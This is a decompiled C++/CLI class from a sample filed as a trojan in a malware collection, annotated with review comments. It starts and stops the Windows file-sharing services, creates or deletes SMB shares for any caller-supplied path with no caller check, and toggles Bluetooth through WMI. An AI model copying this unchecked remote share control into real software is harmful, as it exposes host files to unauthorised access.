MalwareSourceCode/MSIL/Trojan/Win32/P/Trojan.Win32.Patched.mf-b68a9fa2c98a839bfc61691e6eb35adb96800cd5aaf0117d115403b016aa72c1/ServiceRemoting.cs

// Decompiled with JetBrains decompiler
// Type: ServiceRemoting
// Assembly: MobilityService, Version=1.0.2519.23335, Culture=neutral, PublicKeyToken=null
// MVID: DCE01E20-F0BF-43A3-ABD9-0E64E99A2DB6
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-b68a9fa2c98a839bfc61691e6eb35adb96800cd5aaf0117d115403b016aa72c1.exe
using \u003CCppImplementationDetails\u003E;
using MobilityInterface;
using System;
using System.Runtime.InteropServices;
public class ServiceRemoting : MarshalByRefObject, MobilityRemotingInterface
{
// Raw pointer to the native WMI helper object used by the Bluetooth/EC methods below.
// It is allocated and constructed in the constructor of this class.
// NOTE(review): nothing in this class deletes the object; confirm whether a finalizer or
// Dispose in the original C++/CLI source was lost in decompilation.
public unsafe WMI* m_WMI;
/// <summary>
/// Allocates a 28-byte native WMI helper object with the C++ <c>new</c> helper, runs its
/// constructor and stores the resulting pointer in <c>m_WMI</c>.
/// </summary>
/// <remarks>
/// This is decompiler output for C++/CLI code (note the <c>__fault</c> block), not compilable C#.
/// </remarks>
public unsafe ServiceRemoting()
{
// Skip allocation when m_WMI is already set.
// NOTE(review): for a freshly constructed object this guard should never be true; it is
// presumably a leftover from the original C++/CLI source.
if ((IntPtr) this.m_WMI != IntPtr.Zero)
return;
WMI* wmiPtr1 = (WMI*) \u003CModule\u003E.@new(28U);
WMI* wmiPtr2;
// ISSUE: fault handler
try
{
// A failed allocation yields a null pointer instead of a constructed object.
wmiPtr2 = (IntPtr) wmiPtr1 == IntPtr.Zero ? (WMI*) 0 : \u003CModule\u003E.WMI\u002E\u007Bctor\u007D(wmiPtr1);
}
__fault
{
// Runs only when the native constructor throws: release the raw allocation.
\u003CModule\u003E.delete((void*) wmiPtr1);
}
// NOTE(review): m_WMI can be null here; the Bluetooth methods pass it on without a null check.
this.m_WMI = wmiPtr2;
}
/// <summary>
/// Reports whether the "lanmanserver" service (the Windows Server / SMB file-sharing service)
/// is currently running.
/// </summary>
/// <returns>
/// <c>true</c> only when the service control manager and the service could be opened, the
/// status query succeeded and the current state is 4 (SERVICE_RUNNING); otherwise <c>false</c>.
/// </returns>
[return: MarshalAs(UnmanagedType.U1)]
public virtual unsafe bool GetFileSharingServiceStatus()
{
// Local machine, default database; 2147483648U is 0x80000000 (GENERIC_READ).
SC_HANDLE__* scHandlePtr1 = \u003CModule\u003E.OpenSCManagerA((sbyte*) 0, (sbyte*) 0, 2147483648U);
if ((IntPtr) scHandlePtr1 == IntPtr.Zero)
return false;
// The mangled symbol is the ANSI string literal "lanmanserver".
SC_HANDLE__* scHandlePtr2 = \u003CModule\u003E.OpenServiceA(scHandlePtr1, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0N\u0040GEBNOFCA\u0040lanmanserver\u003F\u0024AA\u0040, 2147483648U);
_SERVICE_STATUS serviceStatus;
// Offset 4 of SERVICE_STATUS is dwCurrentState.
// NOTE(review): neither handle is passed to CloseServiceHandle, so every call leaks two
// service control manager handles.
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
return (IntPtr) scHandlePtr2 != IntPtr.Zero && \u003CModule\u003E.QueryServiceStatus(scHandlePtr2, &serviceStatus) != 0 && ^(int&) ((IntPtr) &serviceStatus + 4) == 4;
}
/// <summary>
/// Asks the service control manager to start the "Browser" service.
/// </summary>
/// <remarks>
/// Despite the name, only "Browser" is started here; "lanmanserver" is not touched by this
/// method. Failures are silent: the method returns without reporting whether the service
/// was started.
/// </remarks>
public virtual unsafe void StartFileSharingService()
{
// 983103U is 0xF003F (SC_MANAGER_ALL_ACCESS); this is far broader than starting a service needs.
SC_HANDLE__* scHandlePtr1 = \u003CModule\u003E.OpenSCManagerA((sbyte*) 0, (sbyte*) 0, 983103U);
if ((IntPtr) scHandlePtr1 == IntPtr.Zero)
return;
// The mangled symbol is the ANSI string literal "Browser"; 983551U is 0xF01FF (SERVICE_ALL_ACCESS).
SC_HANDLE__* scHandlePtr2 = \u003CModule\u003E.OpenServiceA(scHandlePtr1, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_07BCFNLIJJ\u0040Browser\u003F\u0024AA\u0040, 983551U);
if ((IntPtr) scHandlePtr2 == IntPtr.Zero)
return;
// No start arguments are passed and the return value is ignored.
// NOTE(review): neither handle is closed on any path.
\u003CModule\u003E.StartServiceA(scHandlePtr2, 0U, (sbyte**) 0);
}
/// <summary>
/// Sends a stop control to the "Browser" service and then to the "lanmanserver" service,
/// waiting up to 30 polls of 500 ms for each to report state 1 (SERVICE_STOPPED).
/// </summary>
/// <remarks>
/// Stopping "lanmanserver" takes every SMB share on the host offline. Service state changes
/// of this kind are normally visible in the System log as Service Control Manager event 7036.
/// The method reports nothing back to the caller; all failures are silent.
/// </remarks>
public virtual unsafe void StopFileSharingService()
{
// 983103U is 0xF003F (SC_MANAGER_ALL_ACCESS).
// NOTE(review): this service control manager handle is never closed.
SC_HANDLE__* scHandlePtr1 = \u003CModule\u003E.OpenSCManagerA((sbyte*) 0, (sbyte*) 0, 983103U);
if ((IntPtr) scHandlePtr1 == IntPtr.Zero)
return;
// First target: "Browser", opened with 0xF01FF (SERVICE_ALL_ACCESS).
SC_HANDLE__* scHandlePtr2 = \u003CModule\u003E.OpenServiceA(scHandlePtr1, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_07BCFNLIJJ\u0040Browser\u003F\u0024AA\u0040, 983551U);
_SERVICE_STATUS serviceStatus;
if ((IntPtr) scHandlePtr2 != IntPtr.Zero)
{
// Control code 1 is SERVICE_CONTROL_STOP; the result of ControlService is not checked.
\u003CModule\u003E.ControlService(scHandlePtr2, 1U, &serviceStatus);
if (\u003CModule\u003E.QueryServiceStatus(scHandlePtr2, &serviceStatus) != 0)
{
// Poll budget: 30 iterations of 500 ms.
int num = 30;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
if (^(int&) ((IntPtr) &serviceStatus + 4) != 1)
{
while (num > 0)
{
\u003CModule\u003E.Sleep(500U);
--num;
// Stop polling when the query fails or dwCurrentState (offset 4) reaches SERVICE_STOPPED.
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
if (\u003CModule\u003E.QueryServiceStatus(scHandlePtr2, &serviceStatus) == 0 || ^(int&) ((IntPtr) &serviceStatus + 4) == 1)
break;
}
}
}
\u003CModule\u003E.CloseServiceHandle(scHandlePtr2);
}
// Second target: "lanmanserver", handled with the same stop-and-poll sequence.
SC_HANDLE__* scHandlePtr3 = \u003CModule\u003E.OpenServiceA(scHandlePtr1, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0N\u0040GEBNOFCA\u0040lanmanserver\u003F\u0024AA\u0040, 983551U);
if ((IntPtr) scHandlePtr3 == IntPtr.Zero)
return;
\u003CModule\u003E.ControlService(scHandlePtr3, 1U, &serviceStatus);
if (\u003CModule\u003E.QueryServiceStatus(scHandlePtr3, &serviceStatus) != 0)
{
int num = 30;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
if (^(int&) ((IntPtr) &serviceStatus + 4) != 1)
{
while (num > 0)
{
\u003CModule\u003E.Sleep(500U);
--num;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
if (\u003CModule\u003E.QueryServiceStatus(scHandlePtr3, &serviceStatus) == 0 || ^(int&) ((IntPtr) &serviceStatus + 4) == 1)
break;
}
}
}
\u003CModule\u003E.CloseServiceHandle(scHandlePtr3);
}
/// <summary>
/// Builds a security descriptor whose owner and single DACL entry are the user that owns an
/// "explorer.exe" process in the active console session (the interactively logged-on user).
/// </summary>
/// <param name="pSecurityDescriptor">
/// Receives a LocalAlloc'd security descriptor, or stays null. The caller must LocalFree it.
/// </param>
/// <param name="pACL">
/// Receives the ACL created by SetEntriesInAclA, or stays null. The caller must LocalFree it.
/// </param>
/// <returns>
/// 0 when the descriptor was fully built; otherwise the initial value 1064, which matches
/// ERROR_EXCEPTION_IN_SERVICE.
/// </returns>
/// <remarks>
/// The single ACE grants 0x10000000 (GENERIC_ALL) to that user. On a failure part-way through,
/// the outputs may already hold allocations even though the return value is non-zero.
/// Offsets assume the 32-bit layout of WTS_PROCESS_INFOA (16 bytes per entry).
/// </remarks>
public unsafe uint GetLogOnUserSecurityDescriptor(void** pSecurityDescriptor, _ACL** pACL)
{
// Scratch storage for the native C++ exception object used by the catch handler below.
// ISSUE: untyped stack allocation
int num1 = (int) __untypedstackalloc(\u003CModule\u003E.__CxxQueryExceptionSize());
// num2 receives the number of process entries returned by WTSEnumerateProcessesA.
uint num2 = 0;
uint securityDescriptor = 1064;
// The outputs start as null so the caller can free unconditionally.
*(int*) pSecurityDescriptor = 0;
*(int*) pACL = 0;
uint consoleSessionId = \u003CModule\u003E.WTSGetActiveConsoleSessionId();
_WTS_PROCESS_INFOA* wtsProcessInfoaPtr1;
// uint.MaxValue means no console session is attached; a null server handle is the local machine.
if (consoleSessionId != uint.MaxValue && \u003CModule\u003E.WTSEnumerateProcessesA((void*) 0, 0U, 1U, &wtsProcessInfoaPtr1, &num2) != 0)
{
// Keep the start of the buffer for WTSFreeMemory; wtsProcessInfoaPtr1 is used as the cursor.
_WTS_PROCESS_INFOA* wtsProcessInfoaPtr2 = wtsProcessInfoaPtr1;
for (uint index = 0; index < num2; ++index)
{
// Offset 8 is pProcessName; substring match against the ANSI literal "explorer.exe".
// NOTE(review): _mbsstr is a case-sensitive substring test, so any process whose name
// merely contains "explorer.exe" matches too.
if ((IntPtr) \u003CModule\u003E._mbsstr((byte*) *(int*) ((IntPtr) wtsProcessInfoaPtr1 + 8), (byte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0N\u0040DGECLGHJ\u0040explorer\u003F4exe\u003F\u0024AA\u0040) != IntPtr.Zero)
{
// Offset 0 is SessionId: only the console session's explorer.exe is accepted.
if (*(int*) wtsProcessInfoaPtr1 == (int) consoleSessionId)
{
try
{
// One zeroed 32-byte EXPLICIT_ACCESS_A entry.
\u0024ArrayType\u0024\u0024\u0024BY00U_EXPLICIT_ACCESS_A\u0040\u0040 uExplicitAccessA;
// ISSUE: initblk instruction
__memset(ref uExplicitAccessA, 0, 32);
// grfAccessPermissions = 0x10000000 (GENERIC_ALL).
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ref uExplicitAccessA = 268435456;
// grfAccessMode = 2 (SET_ACCESS).
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &uExplicitAccessA + 4) = 2;
// grfInheritance = 0 (no inheritance).
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &uExplicitAccessA + 8) = 0;
// Trustee (offset 12) is the process owner's SID (pUserSid, offset 12 of the WTS entry).
\u003CModule\u003E.BuildTrusteeWithSidA((_TRUSTEE_A*) ((IntPtr) &uExplicitAccessA + 12), (void*) *(int*) ((IntPtr) wtsProcessInfoaPtr1 + 12));
// A new ACL is created from the single entry; a non-zero return is an error.
if (0U != \u003CModule\u003E.SetEntriesInAclA(1U, (_EXPLICIT_ACCESS_A*) &uExplicitAccessA, (_ACL*) 0, pACL))
throw new Exception();
// 64U is 0x40 (LPTR, zero-initialised); 20 bytes is the 32-bit SECURITY_DESCRIPTOR size.
void* voidPtr = \u003CModule\u003E.LocalAlloc(64U, 20U);
*(int*) pSecurityDescriptor = (int) voidPtr;
if (IntPtr.Zero == (IntPtr) voidPtr)
throw new Exception();
// Revision 1 is SECURITY_DESCRIPTOR_REVISION.
if (\u003CModule\u003E.InitializeSecurityDescriptor(voidPtr, 1U) == 0)
throw new Exception();
// NOTE(review): an absolute-format descriptor references the owner SID rather than copying
// it. The SID lives in the WTS buffer that WTSFreeMemory releases before this method
// returns, so the owner pointer appears to dangle once the caller uses the descriptor.
// The return value of this call is also ignored.
\u003CModule\u003E.SetSecurityDescriptorOwner((void*) *(int*) pSecurityDescriptor, (void*) *(int*) ((IntPtr) wtsProcessInfoaPtr1 + 12), 1);
// The DACL is marked present and not defaulted.
if (\u003CModule\u003E.SetSecurityDescriptorDacl((void*) *(int*) pSecurityDescriptor, 1, (_ACL*) *(int*) pACL, 0) == 0)
throw new Exception();
securityDescriptor = 0U;
break;
}
// Decompiler rendering of a native C++ catch handler: the failure is swallowed and the
// loop is left with the 1064 result still in place.
catch (Exception ex1) when (
{
// ISSUE: unable to correctly present filter
uint exceptionCode = (uint) Marshal.GetExceptionCode();
if (\u003CModule\u003E.__CxxExceptionFilter((void*) Marshal.GetExceptionPointers(), (void*) 0, 0, (void*) 0) != 0)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
uint num3 = 0;
\u003CModule\u003E.__CxxRegisterExceptionObject((void*) Marshal.GetExceptionPointers(), (void*) num1);
try
{
try
{
}
catch (Exception ex2) when (
{
// ISSUE: unable to correctly present filter
num3 = (uint) \u003CModule\u003E.__CxxDetectRethrow((void*) Marshal.GetExceptionPointers());
if (num3 != 0U)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
}
break;
// The statements below follow an unconditional break and are unreachable as decompiled.
if (num3 != 0U)
throw;
else
break;
}
finally
{
\u003CModule\u003E.__CxxUnregisterExceptionObject((void*) num1, (int) num3);
}
}
}
}
// Advance to the next entry.
// NOTE(review): presumably a 16-byte step in the original; the decompiler shows byte
// arithmetic on a typed pointer — confirm against the IL.
wtsProcessInfoaPtr1 += 16;
}
\u003CModule\u003E.WTSFreeMemory((void*) wtsProcessInfoaPtr2);
}
return securityDescriptor;
}
/// <summary>
/// Creates a disk share named <paramref name="sharedName"/> for the local path
/// <paramref name="sharedFolder"/> through NetShareAdd (information level 502), attaching the
/// security descriptor built by <c>GetLogOnUserSecurityDescriptor</c>.
/// </summary>
/// <param name="sharedName">Share name, passed to the API unchanged.</param>
/// <param name="sharedFolder">Local path to share, passed to the API unchanged.</param>
/// <returns><c>true</c> when NetShareAdd returned 0; otherwise <c>false</c>.</returns>
/// <remarks>
/// The class derives from MarshalByRefObject, so this method is reachable by remoting callers.
/// Neither argument is validated and no caller check is made here, so whoever can reach the
/// object decides which local path is exported. With file-share auditing enabled, share
/// creation is recorded as Security event 5142.
/// </remarks>
[return: MarshalAs(UnmanagedType.U1)]
public virtual unsafe bool AddSharedFolder(string sharedName, string sharedFolder)
{
// Both strings are copied to unmanaged UTF-16 buffers, freed at the end of the method.
char* hglobalUni1 = (char*) (void*) Marshal.StringToHGlobalUni(sharedName);
char* hglobalUni2 = (char*) (void*) Marshal.StringToHGlobalUni(sharedFolder);
// num receives NetShareAdd's parameter-error index; it is never read afterwards.
uint num = 0;
void* voidPtr = (void*) 0;
_ACL* aclPtr = (_ACL*) 0;
// NOTE(review): the status is stored but never checked. If descriptor construction failed,
// voidPtr may be null or only partly initialised, and the share is still created; a null
// descriptor presumably means the system default share permissions apply.
int securityDescriptor = (int) this.GetLogOnUserSecurityDescriptor(&voidPtr, &aclPtr);
// The SHARE_INFO_502 fields are written by offset (32-bit layout).
_SHARE_INFO_502 shareInfo502;
// +0 shi502_netname
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ref shareInfo502 = (int) hglobalUni1;
// +4 shi502_type = 0 (disk share)
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 4) = 0;
// +8 shi502_remark = empty wide string literal
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 8) = (int) &\u003CModule\u003E.\u003F\u003F_C\u0040_11LOCGONAA\u0040\u003F\u0024AA\u003F\u0024AA\u0040;
// +12 shi502_permissions = 0
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 12) = 0;
// +16 shi502_max_uses = 4 concurrent connections
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 16) = 4;
// +20 shi502_current_uses = 0
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 20) = 0;
// +24 shi502_path
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 24) = (int) hglobalUni2;
// +28 shi502_passwd = null
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 28) = 0;
// +36 shi502_security_descriptor
// NOTE(review): offset 32 (shi502_reserved) is never written and the struct is not zeroed.
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &shareInfo502 + 36) = (int) voidPtr;
// A null server name targets the local machine.
bool flag = \u003CModule\u003E.NetShareAdd((char*) 0, 502U, (byte*) &shareInfo502, &num) == 0U;
// 512 is SHCNE_NETSHARE; the shell is notified even when the share was not created.
// NOTE(review): flag 1U looks like SHCNF_PATHA (ANSI path) while the buffer holds UTF-16.
\u003CModule\u003E.SHChangeNotify(512, 1U, (void*) hglobalUni2, (void*) 0);
if ((IntPtr) aclPtr != IntPtr.Zero)
\u003CModule\u003E.LocalFree((void*) aclPtr);
if ((IntPtr) voidPtr != IntPtr.Zero)
\u003CModule\u003E.LocalFree(voidPtr);
Marshal.FreeHGlobal(new IntPtr((void*) hglobalUni1));
Marshal.FreeHGlobal(new IntPtr((void*) hglobalUni2));
return flag;
}
/// <summary>
/// Deletes the share named <paramref name="sharedName"/> on the local machine through
/// NetShareDel and notifies the shell about <paramref name="sharedFolder"/>.
/// </summary>
/// <param name="sharedName">Name of the share to delete, passed to the API unchanged.</param>
/// <param name="sharedFolder">Path used only for the shell change notification.</param>
/// <returns><c>true</c> when NetShareDel returned 0; otherwise <c>false</c>.</returns>
/// <remarks>
/// Nothing here checks that the share was created by this service, so any existing share
/// name supplied by the caller is deleted. With file-share auditing enabled, deletion is
/// recorded as Security event 5144.
/// </remarks>
[return: MarshalAs(UnmanagedType.U1)]
public virtual unsafe bool RemoveSharedFolder(string sharedName, string sharedFolder)
{
// Both strings are copied to unmanaged UTF-16 buffers, freed before returning.
char* hglobalUni1 = (char*) (void*) Marshal.StringToHGlobalUni(sharedName);
char* hglobalUni2 = (char*) (void*) Marshal.StringToHGlobalUni(sharedFolder);
bool flag = true;
// A null server name targets the local machine.
if (\u003CModule\u003E.NetShareDel((char*) 0, hglobalUni1, 0U) != 0U)
flag = false;
// 1024 is SHCNE_NETUNSHARE; the notification is sent even when deletion failed.
// NOTE(review): flag 1U looks like SHCNF_PATHA (ANSI path) while the buffer holds UTF-16.
\u003CModule\u003E.SHChangeNotify(1024, 1U, (void*) hglobalUni2, (void*) 0);
Marshal.FreeHGlobal(new IntPtr((void*) hglobalUni1));
Marshal.FreeHGlobal(new IntPtr((void*) hglobalUni2));
return flag;
}
/// <summary>
/// Calls the native WMI helper's <c>WMIMethodExecGet</c> and returns the integer stored in
/// the result variant.
/// </summary>
/// <returns>
/// The 32-bit value at offset 8 of the result VARIANT when the helper returns 0; -1 otherwise.
/// </returns>
/// <remarks>
/// The three mangled wide-string literals decode to <c>ECDeviceControl.InstanceName="AC…</c>
/// (the symbol name is truncated), <c>GetBluetooth</c> and <c>uStatus</c>. Presumably these are
/// the instance path, method name and output property; the helper is not shown here.
/// </remarks>
public virtual unsafe int GetBluetooth()
{
tagVARIANT tagVariant;
\u003CModule\u003E.VariantInit(&tagVariant);
// NOTE(review): m_WMI is passed without a null check.
if (\u003CModule\u003E.WMI\u002EWMIMethodExecGet(this.m_WMI, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1GE\u0040OBACBGCF\u0040\u003F\u0024AAE\u003F\u0024AAC\u003F\u0024AAD\u003F\u0024AAe\u003F\u0024AAv\u003F\u0024AAi\u003F\u0024AAc\u003F\u0024AAe\u003F\u0024AAC\u003F\u0024AAo\u003F\u0024AAn\u003F\u0024AAt\u003F\u0024AAr\u003F\u0024AAo\u003F\u0024AAl\u003F\u0024AA\u003F4\u003F\u0024AAI\u003F\u0024AAn\u003F\u0024AAs\u003F\u0024AAt\u003F\u0024AAa\u003F\u0024AAn\u003F\u0024AAc\u003F\u0024AAe\u003F\u0024AAN\u003F\u0024AAa\u003F\u0024AAm\u003F\u0024AAe\u003F\u0024AA\u003F\u0024DN\u003F\u0024AA\u003F\u0024CC\u003F\u0024AAA\u003F\u0024AAC\u0040, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1BK\u0040CKLOFOL\u0040\u003F\u0024AAG\u003F\u0024AAe\u003F\u0024AAt\u003F\u0024AAB\u003F\u0024AAl\u003F\u0024AAu\u003F\u0024AAe\u003F\u0024AAt\u003F\u0024AAo\u003F\u0024AAo\u003F\u0024AAt\u003F\u0024AAh\u003F\u0024AA\u003F\u0024AA\u0040, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1BA\u0040POAHONEM\u0040\u003F\u0024AAu\u003F\u0024AAS\u003F\u0024AAt\u003F\u0024AAa\u003F\u0024AAt\u003F\u0024AAu\u003F\u0024AAs\u003F\u0024AA\u003F\u0024AA\u0040, &tagVariant) == 0)
{
// Offset 8 of VARIANT is the value union; it is read as an int without checking the vt tag.
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
int bluetooth = ^(int&) ((IntPtr) &tagVariant + 8);
\u003CModule\u003E.VariantClear(&tagVariant);
return bluetooth;
}
\u003CModule\u003E.VariantClear(&tagVariant);
return -1;
}
/// <summary>
/// Calls the native WMI helper's <c>WMIMethodExecSet</c> with a VT_I4 input variant holding
/// <paramref name="Brightness"/>.
/// </summary>
/// <param name="Brightness">
/// Value written into the input variant. NOTE(review): the name looks like a copy-paste from
/// a brightness setter; here it is the value sent with the <c>SetBluetooth</c> method.
/// </param>
/// <remarks>
/// The mangled wide-string literals decode to <c>ECDeviceControl</c>,
/// <c>ECDeviceControl.InstanceName="AC…</c> (truncated symbol), <c>SetBluetooth</c>,
/// <c>uStatus</c> and <c>uErrorCode</c>. The helper's return value is discarded, so the caller
/// gets no indication of failure.
/// </remarks>
public virtual unsafe void SetBluetooth(int Brightness)
{
// tagVariant1 receives the helper's output; tagVariant2 carries the input value.
tagVARIANT tagVariant1;
\u003CModule\u003E.VariantInit(&tagVariant1);
tagVARIANT tagVariant2;
\u003CModule\u003E.VariantInit(&tagVariant2);
// vt = 3 (VT_I4)
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ref tagVariant2 = (short) 3;
// The value union at offset 8 takes the caller-supplied integer, unvalidated.
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &tagVariant2 + 8) = Brightness;
\u003CModule\u003E.WMI\u002EWMIMethodExecSet(this.m_WMI, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1CA\u0040FPONMHDE\u0040\u003F\u0024AAE\u003F\u0024AAC\u003F\u0024AAD\u003F\u0024AAe\u003F\u0024AAv\u003F\u0024AAi\u003F\u0024AAc\u003F\u0024AAe\u003F\u0024AAC\u003F\u0024AAo\u003F\u0024AAn\u003F\u0024AAt\u003F\u0024AAr\u003F\u0024AAo\u003F\u0024AAl\u003F\u0024AA\u003F\u0024AA\u0040, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1GE\u0040OBACBGCF\u0040\u003F\u0024AAE\u003F\u0024AAC\u003F\u0024AAD\u003F\u0024AAe\u003F\u0024AAv\u003F\u0024AAi\u003F\u0024AAc\u003F\u0024AAe\u003F\u0024AAC\u003F\u0024AAo\u003F\u0024AAn\u003F\u0024AAt\u003F\u0024AAr\u003F\u0024AAo\u003F\u0024AAl\u003F\u0024AA\u003F4\u003F\u0024AAI\u003F\u0024AAn\u003F\u0024AAs\u003F\u0024AAt\u003F\u0024AAa\u003F\u0024AAn\u003F\u0024AAc\u003F\u0024AAe\u003F\u0024AAN\u003F\u0024AAa\u003F\u0024AAm\u003F\u0024AAe\u003F\u0024AA\u003F\u0024DN\u003F\u0024AA\u003F\u0024CC\u003F\u0024AAA\u003F\u0024AAC\u0040, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1BK\u0040ICGNCIEN\u0040\u003F\u0024AAS\u003F\u0024AAe\u003F\u0024AAt\u003F\u0024AAB\u003F\u0024AAl\u003F\u0024AAu\u003F\u0024AAe\u003F\u0024AAt\u003F\u0024AAo\u003F\u0024AAo\u003F\u0024AAt\u003F\u0024AAh\u003F\u0024AA\u003F\u0024AA\u0040, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1BA\u0040POAHONEM\u0040\u003F\u0024AAu\u003F\u0024AAS\u003F\u0024AAt\u003F\u0024AAa\u003F\u0024AAt\u003F\u0024AAu\u003F\u0024AAs\u003F\u0024AA\u003F\u0024AA\u0040, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1BG\u0040IMJCDLFP\u0040\u003F\u0024AAu\u003F\u0024AAE\u003F\u0024AAr\u003F\u0024AAr\u003F\u0024AAo\u003F\u0024AAr\u003F\u0024AAC\u003F\u0024AAo\u003F\u0024AAd\u003F\u0024AAe\u003F\u0024AA\u003F\u0024AA\u0040, &tagVariant2, &tagVariant1);
// NOTE(review): only the input variant is cleared; tagVariant1 is never passed to VariantClear.
\u003CModule\u003E.VariantClear(&tagVariant2);
}
/// <summary>
/// Reads a device-presence value through the native WMI helper's <c>WMIDataBlockRead</c> and
/// tests bit 0x10 of it.
/// </summary>
/// <returns>
/// <c>true</c> when the helper returns 0 and bit 16 (0x10) of the returned integer is set;
/// <c>false</c> otherwise, including when the read fails.
/// </returns>
/// <remarks>
/// The mangled wide-string literals decode to <c>SELECT * FROM ECDeviceExist</c> and
/// <c>uECDeviceExist</c>. That bit 0x10 denotes the Bluetooth device is inferred from the
/// method name only.
/// </remarks>
[return: MarshalAs(UnmanagedType.U1)]
public virtual unsafe bool GetBluetoothExist()
{
tagVARIANT tagVariant;
\u003CModule\u003E.VariantInit(&tagVariant);
// NOTE(review): m_WMI is passed without a null check.
if (\u003CModule\u003E.WMI\u002EWMIDataBlockRead(this.m_WMI, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1DI\u0040KLICGGKE\u0040\u003F\u0024AAS\u003F\u0024AAE\u003F\u0024AAL\u003F\u0024AAE\u003F\u0024AAC\u003F\u0024AAT\u003F\u0024AA\u003F5\u003F\u0024AA\u003F\u0024CK\u003F\u0024AA\u003F5\u003F\u0024AAF\u003F\u0024AAR\u003F\u0024AAO\u003F\u0024AAM\u003F\u0024AA\u003F5\u003F\u0024AAE\u003F\u0024AAC\u003F\u0024AAD\u003F\u0024AAe\u003F\u0024AAv\u003F\u0024AAi\u003F\u0024AAc\u003F\u0024AAe\u003F\u0024AAE\u003F\u0024AAx\u003F\u0024AAi\u003F\u0024AAs\u003F\u0024AAt\u003F\u0024AA\u003F\u0024AA\u0040, (char*) &\u003CModule\u003E.\u003F\u003F_C\u0040_1BO\u0040GDAMCCI\u0040\u003F\u0024AAu\u003F\u0024AAE\u003F\u0024AAC\u003F\u0024AAD\u003F\u0024AAe\u003F\u0024AAv\u003F\u0024AAi\u003F\u0024AAc\u003F\u0024AAe\u003F\u0024AAE\u003F\u0024AAx\u003F\u0024AAi\u003F\u0024AAs\u003F\u0024AAt\u003F\u0024AA\u003F\u0024AA\u0040, &tagVariant) == 0)
{
// Offset 8 of VARIANT is the value union, read as an int without checking the vt tag.
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
if ((^(int&) ((IntPtr) &tagVariant + 8) & 16) != 0)
{
\u003CModule\u003E.VariantClear(&tagVariant);
return true;
}
\u003CModule\u003E.VariantClear(&tagVariant);
return false;
}
\u003CModule\u003E.VariantClear(&tagVariant);
return false;
}
}